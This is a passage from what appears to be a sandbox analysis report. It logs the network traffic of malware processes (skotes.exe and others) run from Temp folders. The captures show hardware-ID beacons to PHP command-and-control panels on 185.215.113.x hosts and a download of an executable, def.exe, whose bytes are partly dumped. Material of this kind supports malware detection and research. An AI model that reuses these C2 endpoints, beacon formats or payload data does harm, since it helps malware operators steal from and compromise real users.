                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 43 33 37 32 30 42 37 32 32 38 39 39 32 32 34 37 36 36 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: ------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="hwid"84C3720B7228992247664------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="build"mars------EGDBFIIECBGDGDGDHCAK--
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:34.169441938 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:33 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            36192.168.2.450065185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:33.472538948 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:34.858066082 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:34 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            37192.168.2.450081185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:36.670922995 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.054184914 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:37 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            38192.168.2.450104185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.876444101 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:41.200949907 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:40 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            39192.168.2.450105185.215.113.206807640C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.917598963 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:41.353925943 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:41 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:41.383601904 CET412OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAA
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 210
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 43 33 37 32 30 42 37 32 32 38 39 39 32 32 34 37 36 36 34 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: ------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="hwid"84C3720B7228992247664------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="build"mars------GCFIIEBKEGHJJJJJJDAA--
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:41.861623049 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:41 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            40192.168.2.450127185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.975620031 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:44.311400890 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:44 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            41192.168.2.450140185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:45.948317051 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:47.329912901 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:47 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            42192.168.2.450144185.215.113.16808024C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:47.345113039 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:48.686968088 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:48 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                            Content-Length: 2811392
                                                                                                                                                                                                                                                                                                            Last-Modified: Thu, 21 Nov 2024 10:52:40 GMT
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            ETag: "673f10f8-2ae600"
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 8a f7 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`+ `@ +*`Ui` @ @.rsrc`2@.idata 8@cpzpcpnh**:@ghvclarm @+*@.taggant@`+"*@
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:48.687009096 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:48.687017918 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:48.687048912 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:48.687060118 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:48.687068939 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:48.687079906 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:48.687094927 CET1000INData Raw: bb dc 7a 80 93 b3 7b 47 24 80 79 cf 14 5e a6 90 b8 77 90 60 f9 95 ad 20 c8 ce 4f 4e 62 75 3f 77 fc 58 d5 e4 65 ab f0 a0 4c 03 46 97 75 91 0b 40 29 c9 5b 91 ed da 0e 4d 1b eb 78 4b 2b c1 c2 72 35 d2 6b 81 93 c7 77 a9 ff fe 5a 57 09 f0 78 f0 dd 3b
                                                                                                                                                                                                                                                                                                            Data Ascii: z{G$y^w` ONbu?wXeLFu@)[MxK+r5kwZWx;hdk@A%ic*umC'k~0pElpY+t+IcL{?/Uz'Wio+$J#Fr6O}/a:BFuJq`(+6qq$[ X|Nqwut
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:48.687104940 CET1236INData Raw: f8 dc f2 ac 37 ed a7 de 95 af 07 c3 35 8d 06 71 c8 94 6d da 93 84 b1 fa 3b fb bd 78 25 83 82 a0 5f d0 7e 09 10 12 2b 86 af 49 df 0e f2 15 46 6d 84 06 62 a9 d1 1f 83 a6 c3 93 3a 98 1a 73 e8 6c a9 fb 50 71 ff f7 78 c1 44 43 db b0 de d6 98 46 cf 90
                                                                                                                                                                                                                                                                                                            Data Ascii: 75qm;x%_~+IFmb:slPqxDCF9ig~zvz0}J^E_&y_zS)F\fz0xKUD3^y;Z;q-hxZwmG/A?y QSuGpBaWe
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:48.687114954 CET1236INData Raw: 59 dc 3c b2 f7 bd 8d 61 11 44 bd f7 f5 52 cb 61 13 44 a5 47 9d 1a 40 ad 11 9e ae dd 21 a5 e2 7a 4c 27 1f a6 af 51 7e 7b e9 3a 82 ec ef d8 17 7d a6 b6 4f ef 3d 7f 5f d6 dd f2 a5 e4 1e 91 15 dd da a7 76 76 95 df a6 e1 e0 88 a5 2e f6 c5 a5 16 dc 09
                                                                                                                                                                                                                                                                                                            Data Ascii: Y<aDRaDG@!zL'Q~{:}O=_vv.1qpru^DVf}pN{DR]P&BQj#7*UN3hp|qw;|a/q\&w"k _jC?awQ?ja
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:48.807638884 CET1236INData Raw: 27 bc 7b 8e 22 f3 f9 a6 5b 3e 0d a8 b4 91 86 90 14 a2 54 bc b2 15 8e 4f 72 9f 12 a9 4d d4 6d de 0e e2 05 40 7d 3c 02 3d 19 db 51 7c 35 de 02 b3 0f d8 46 94 08 d1 49 4d ad 9e 75 7d f3 d6 fb 45 23 e1 7f 1c 62 fb a0 79 14 09 15 6d 1f 83 1e 17 14 f2
                                                                                                                                                                                                                                                                                                            Data Ascii: '{"[>TOrMm@}<=Q|5FIMu}E#bymzpU{l?u]~1q.,Im_~fw~G"_RkD&-S7+(^AuR@)MKoN'(fXlBBDx~zP4EHqwooe,p4b&]Z


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            43192.168.2.450151185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:49.069365978 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:50.410465002 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:50 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            44192.168.2.450158185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:52.042227983 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:53.387001038 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:53 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            45192.168.2.450168185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:55.153337955 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:56.539027929 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:56 GMT
